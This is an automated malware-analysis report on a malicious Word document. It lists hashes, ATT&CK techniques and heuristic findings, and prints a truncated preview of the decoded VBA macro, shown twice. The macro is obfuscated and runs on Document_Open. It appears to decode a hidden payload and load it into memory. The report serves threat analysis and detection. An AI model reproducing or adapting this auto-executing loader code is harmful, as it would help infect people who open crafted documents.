Office (OLE) malware analysis — malicious · 5501becff6eb4ca1

MALICIOUS

Office (OLE)

209.5 KB Created: 2017-07-31 23:01:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: 0e1fc57d3f888c5658b0068a977b8b21 SHA-1: 931cecb7200f8ad2588fb24923dbdfdf904bea89 SHA-256: 5501becff6eb4ca1f77eb75a1d66130b112e7d2d4b706ef597602ebdcc654179

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The presence of a 'Document_Open' macro and a large amount of slack space in the OLE structure are strong indicators of malicious intent. The VBA macro 'condition' appears to be designed to download and execute a second-stage payload, although the exact URL is obfuscated. The macro's execution is triggered automatically upon opening the document, consistent with a spearphishing attachment.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 214,530 bytes but its declared streams total only 120,359 bytes — 94,171 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5235 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5235 bytes
SHA-256: `6241d1f34d13284cae72a23dd624a58d442104634c2473f67b4bdad262c7428d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub condition() Dim anaesthetize As Long Dim angora As Long coumarouna.nitrile.Value = Day(#12/5/2013#) varday = aphonic = unintroduced inconsiderable = "evade" deanery = "plagihedral" allowable = "replacement" forlorn = "bakshish" melody = "oak" slickness = asynchronism Set linebacker = coumarouna.nitrile.SelectedItem naturalization = 18 absterge = 8684 pummel = 274789 Pmt 0, naturalization, 23499, 35977, 8 fragmentary = linebacker.Name dying = 7844 doit = Right(fragmentary, dying) salerno = cefoperazone.bond(doit) cestrum = 82 blackquarter = 6831 cloudlessness = 491648 Pmt 0, cestrum, 5134, 58763, 6 thrush = "tinctorial" bad = androgen #If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then Dim physique As String Dim snowball As LongPtr Dim sapienti As LongPtr Dim acanthus As String #End If #If (3 * 4 + 5) > (7 - 2 * 1) And Not Win64 > (10 - 5 * 2) * 2 Then Dim overstrung As Long Dim sapienti As Long Dim fingerspelling As Integer Dim snowball As Long #End If cellist = 39 - 39 leeway = "bungalow" chaeronea = 4096 duet = 54 bavardage = 32580 sabbatarianism = 387888 Pmt 0, duet, 19269, 31789, 5 conceivably = "sayornis" potaufeu = "pessimal" forasmuch = "honeycombed" aim = "tinctured" dissuasive = 109 morphologic = 35974 cieceronian = 129205 Pmt 0, dissuasive, 8641, 35516, 4 aerobic = salerno neve = "balister" scotch = "kingdom" snowball = blockade(aerobic) confuted = "luddite" #If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then Dim unhewn As String Dim onepan As LongPtr Dim introspection As LongPtr Dim parthenocissus As LongPtr inapplicability = 25 + 126 + 1913 #End If #If (3 * 4 + 5) > (7 - 2 * 1) And Not Win64 > (10 - 5 * 2) * 2 Then Dim onepan As Long bawbee = 78 + 6 + 697 Dim introspection As Long Dim parthenocissus As Long inapplicability = bawbee + 3459 #End If Dim temporis As Byte Dim drixoral As Long onepan = 0 sapienti = snowball + inapplicability introspection = 99 - 83 + 201511 parthenocissus = 3500 artificially = odyllic(introspection, onepan, sapienti, onepan, onepan, onepan, onepan) perfective = 7 pellicle = 30898 arborescence = 400949 Pmt 0, perfective, 36836, 48257, 4 End Sub Private Sub Document_Open() Dim phylloxeridae As Integer Dim nootka As Integer coagulation = "rollicker" equisetum = "enology" condition erroneousness = 90 + 2 boron = 28700 + 6 morose = 595280 + 6 Pmt 0, erroneousness, 12009, 20396, 2 End Sub Function cooptation(morsel, damnosa, houseroom) #If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then Dim micelle As Integer Dim himantoglossum As Integer Dim ea As LongPtr Dim southbound As LongPtr Dim delivery As LongPtr Dim unfrock As Variant Dim paralytic As LongPtr Dim headship As LongPtr #End If #If (3 * 4 + 5) > (7 - 2 * 1) And Not Win64 > (10 - 5 * 2) * 2 Then Dim southbound As Long Dim unreservedly As Integer Dim ea As Long Dim placate As Byte Dim paralytic As Long Dim dispensary As String Dim delivery As Long Dim balmy As Byte Dim headship As Long Dim drone As Byte Dim aspera As Integer #End If alto = andorra blister = Math.Round(210) southbound = morsel headship = houseroom andorra = "apium" paralytic = damnosa traditionary = 92 alliaria = 4950 compages = 134484 Pmt 0, traditionary, 5377, 12066, 6 blister = Fix(476) ea = 78 + 34 - 113 encage ByVal ea, southbound, paralytic, headship, delivery raven = blister \ 215 End Function Function blockade(adynamic) Dim catchpenny As Integer Dim perceptible As String Dim rape As Byte Dim antilogy As Variant #If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then Dim depurate As Byte Dim sich As LongPtr depicture = 12 - 4 Dim memo As LongPtr Dim frighte ... (truncated)

SHA-256: 6241d1f34d13284cae72a23dd624a58d442104634c2473f67b4bdad262c7428d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Sub condition()
Dim anaesthetize As Long
Dim angora As Long
coumarouna.nitrile.Value = Day(#12/5/2013#)
varday = aphonic = unintroduced
inconsiderable = "evade"
deanery = "plagihedral"
allowable = "replacement"
forlorn = "bakshish"

melody = "oak"
slickness = asynchronism
Set linebacker = coumarouna.nitrile.SelectedItem
naturalization = 18
absterge = 8684
pummel = 274789
 Pmt 0, naturalization, 23499, 35977, 8

fragmentary = linebacker.Name
dying = 7844
doit = Right(fragmentary, dying)
salerno = cefoperazone.bond(doit)
cestrum = 82
blackquarter = 6831
cloudlessness = 491648
 Pmt 0, cestrum, 5134, 58763, 6

thrush = "tinctorial"
bad = androgen
#If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then
Dim physique As String
Dim snowball As LongPtr
Dim sapienti As LongPtr
Dim acanthus As String
#End If
#If (3 * 4 + 5) > (7 - 2 * 1) And Not Win64 > (10 - 5 * 2) * 2 Then
Dim overstrung As Long
Dim sapienti As Long
Dim fingerspelling As Integer
Dim snowball As Long
#End If
cellist = 39 - 39
leeway = "bungalow"
chaeronea = 4096
duet = 54
bavardage = 32580
sabbatarianism = 387888
 Pmt 0, duet, 19269, 31789, 5

conceivably = "sayornis"
potaufeu = "pessimal"
forasmuch = "honeycombed"
aim = "tinctured"
dissuasive = 109
morphologic = 35974
cieceronian = 129205
 Pmt 0, dissuasive, 8641, 35516, 4

aerobic = salerno
neve = "balister"
scotch = "kingdom"
snowball = blockade(aerobic)
confuted = "luddite"
#If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then
Dim unhewn As String
Dim onepan As LongPtr
Dim introspection As LongPtr
Dim parthenocissus As LongPtr
inapplicability = 25 + 126 + 1913
#End If
#If (3 * 4 + 5) > (7 - 2 * 1) And Not Win64 > (10 - 5 * 2) * 2 Then
Dim onepan As Long
bawbee = 78 + 6 + 697
Dim introspection As Long
Dim parthenocissus As Long
inapplicability = bawbee + 3459

#End If
Dim temporis As Byte
Dim drixoral As Long
onepan = 0
sapienti = snowball + inapplicability
introspection = 99 - 83 + 201511
parthenocissus = 3500
artificially = odyllic(introspection, onepan, sapienti, onepan, onepan, onepan, onepan)
perfective = 7
pellicle = 30898
arborescence = 400949
 Pmt 0, perfective, 36836, 48257, 4

End Sub
Private Sub Document_Open()
Dim phylloxeridae As Integer
Dim nootka As Integer
coagulation = "rollicker"
equisetum = "enology"
condition
erroneousness = 90 + 2
boron = 28700 + 6
morose = 595280 + 6
 Pmt 0, erroneousness, 12009, 20396, 2
End Sub

Function cooptation(morsel, damnosa, houseroom)
#If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then
Dim micelle As Integer
Dim himantoglossum As Integer
Dim ea As LongPtr
Dim southbound As LongPtr
Dim delivery As LongPtr
Dim unfrock As Variant
Dim paralytic As LongPtr
Dim headship As LongPtr
#End If
#If (3 * 4 + 5) > (7 - 2 * 1) And Not Win64 > (10 - 5 * 2) * 2 Then
Dim southbound As Long
Dim unreservedly As Integer
Dim ea As Long
Dim placate As Byte
Dim paralytic As Long
Dim dispensary As String
Dim delivery As Long
Dim balmy As Byte
Dim headship As Long
Dim drone As Byte
Dim aspera As Integer
#End If
alto = andorra
blister = Math.Round(210)
southbound = morsel
headship = houseroom
andorra = "apium"
paralytic = damnosa
traditionary = 92
alliaria = 4950
compages = 134484
 Pmt 0, traditionary, 5377, 12066, 6

blister = Fix(476)
ea = 78 + 34 - 113
encage ByVal ea, southbound, paralytic, headship, delivery
raven = blister \ 215
End Function
Function blockade(adynamic)
Dim catchpenny As Integer
Dim perceptible As String
Dim rape As Byte
Dim antilogy As Variant
#If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then
Dim depurate As Byte
Dim sich As LongPtr
depicture = 12 - 4
Dim memo As LongPtr
Dim frighte
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.